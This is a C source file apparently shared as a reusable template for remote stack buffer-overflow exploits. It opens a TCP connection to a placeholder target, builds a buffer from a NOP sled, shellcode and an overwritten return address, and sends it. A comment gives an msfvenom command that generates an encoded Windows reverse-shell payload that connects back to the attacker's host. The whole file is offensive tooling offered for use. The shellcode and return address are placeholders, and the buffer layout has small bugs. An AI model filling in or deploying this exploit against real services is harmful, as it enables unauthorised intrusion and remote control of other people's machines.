Template for a remote exploit written in C. Disables nagles algorithm

remote_exploit_template.c

/*
  @snowcra5h

  This is a template for a remote exploit.
  It is a skeleton that you can use to build your own exploit.

    +------------------+ <- Higher Memory Addresses
    |     ...          |
    +------------------+
    |  Return Address  | <- Overwritten with "\x04\x03\x02\x01"
    +------------------+
    |     Shellcode    | <- Your shellcode inserted here
    +------------------+
    |     NOP sled     | <- NOP (0x90) instructions
    +------------------+
    |  Initial Part of |
    |    the Buffer    | <- Data received before the exploit preparation
    +------------------+
    |     ...          |
    +------------------+ <- Lower Memory Addresses
*/

#include <errno.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/tcp.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <time.h>
#include <unistd.h>

/* change as required */
const char *remote_host = "1.2.3.4";
#define REMOTE_PORT_NUM 8001
#define BUFFER_SIZE 256
#define OFFSET 141
#define ERROR -1

/*
  use msfvenom to generate what ever shellcode you want for your exploit and replace the shellcode below
  msfvenom -p windows/shell_reverse_tcp                 ; reverse shell payload
              LHOST=your.ip.here LPORT=your.local.port  ; this is the ip and port the remote computer will connect back
  to on your system -f c                                ; format is in 'c' -e x86/shikata_ga_nai ; polymorphic
  encoding -b x00                                       ; the bad characters to avoid
*/

char shellcode[] = "\x90\x90\x90\x90"
                   "\x90\x90\x90\x90"
                   "\x90\x90\x90\x90"
                   "\x90\x90\x90\x90"
                   "\x90\x90\x90\x90"
                   "\x90\x90\x90\x90"
                   "\x90\x90\x90\x90"
                   "\x90\x90\x90\x90"
                   "\x90\x90\x90\x90"
                   "\x90\x90\x90\x90";

/* functions to set up your exploit */
ssize_t receive_data(int sockfd, char *buffer, size_t buf_size);
void clear_buffer(char *buffer, size_t buf_size);
void prepare_buffer(char *buffer);
void send_data(int sockfd, const char *buffer, size_t buf_size);
void process_sock_communication(int sockfd);

/* functions to set up the socket */
void setup_address(struct sockaddr_in *addr, struct hostent *hp, int port);
int create_socket(void);
int disable_nagle(int sock);
int connect_socket(int sock, struct sockaddr_in *addr);
struct hostent *resolve_host(char *host);
int create_and_configure_socket(char *host, int port);

int main(int argc, char *argv[])
{
    int s;

    /* connect to remote host */
    s = create_and_configure_socket(remote_host, REMOTE_PORT_NUM);

    /* send the payload */
    process_sock_communication(s);

    /* Close the socket */
    close(s);

    return (0);
}

void process_sock_communication(int sockfd)
{
    char buffer[BUFFER_SIZE];
    int total_bytes = 0;

    while (1)
    {
        ssize_t num_bytes = receive_data(sockfd, buffer, BUFFER_SIZE);
        if (num_bytes > 0)
        {
            total_bytes += num_bytes;
            clear_buffer(buffer, BUFFER_SIZE);
            prepare_buffer(buffer);
            send_data(sockfd, buffer, BUFFER_SIZE);
        }
        else if (num_bytes <= 0)
        {
            break;
        }
    }
}

int create_and_configure_socket(char *host, int port)
{
    int sock;
    struct sockaddr_in addr;
    int on = 1;
    struct hostent *hp;

    /* Resolve host name */
    if ((hp = resolve_host(host)) == NULL)
    {
        goto error;
    }

    /* Set up address structure */
    setup_address(&addr, hp, port);

    /* Create socket */
    if ((sock = create_socket()) == ERROR)
    {
        goto error;
    }

    /* Disable Nagle's algorithm */
    if (disable_nagle(sock) == ERROR)
    {
        goto error_close_sock;
    }

    /* Connect */
    if (connect_socket(sock, &addr) == ERROR)
    {
        goto error_close_sock;
    }

    return sock;

error_close_sock:
    close(sock);

error:
    return ERROR;
}

ssize_t receive_data(int sockfd, char *buffer, size_t buf_size)
{
    ssize_t num_bytes = recv(sockfd, buffer, buf_size - 1, 0);
    if (num_bytes > 0)
    {
        buffer[num_bytes] = '\0';
        printf("Received: %s\n", buffer);
    }
    else if (num_bytes == 0)
    {
        printf("Connection closed by peer.\n");
    }
    else
    {
        perror("recv");
    }
    return num_bytes;
}

void clear_buffer(char *buffer, size_t buf_size)
{
    memset(buffer, 0, buf_size);
}

void prepare_buffer(char *buffer)
{
    /* NOP sled */
    for (int i = 0; i < OFFSET; i++)
    {
        buffer[i] = 0x90;
    }

    /* Shellcode */
    memcpy(buffer, shellcode, strlen(shellcode));

    /* Return address or ROP chain */
    memcpy(buffer + OFFSET - 5, "\x04\x03\x02\x01", 4);
}

void send_data(int sockfd, const char *buffer, size_t buf_size)
{
    if (send(sockfd, buffer, buf_size, 0) < 0)
    {
        perror("send");
    }
}

void setup_address(struct sockaddr_in *addr, struct hostent *hp, int port)
{
    memset(addr, 0, sizeof(*addr));
    addr->sin_port = htons(port);
    addr->sin_family = AF_INET;
    memcpy(&(addr->sin_addr), hp->h_addr_list[0], hp->h_length);
}

int create_socket(void)
{
    int sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock < 0)
    {
        perror("socket");
        return -1;
    }
    return sock;
}

int disable_nagle(int sock)
{
    int on = 1;
    if (setsockopt(sock, IPPROTO_TCP, TCP_NODELAY, (const char *)&on, sizeof(int)) < 0)
    {
        perror("setsockopt");
        return -1;
    }
    return 0;
}

int connect_socket(int sock, struct sockaddr_in *addr)
{
    if (connect(sock, (struct sockaddr *)addr, sizeof(struct sockaddr_in)) == -1)
    {
        perror("connect");
        return -1;
    }
    return 0;
}

struct hostent *resolve_host(char *host)
{
    struct hostent *hp = gethostbyname(host);
    if (hp == NULL)
    {
        herror("gethostbyname");
        return NULL;
    }
    return hp;
}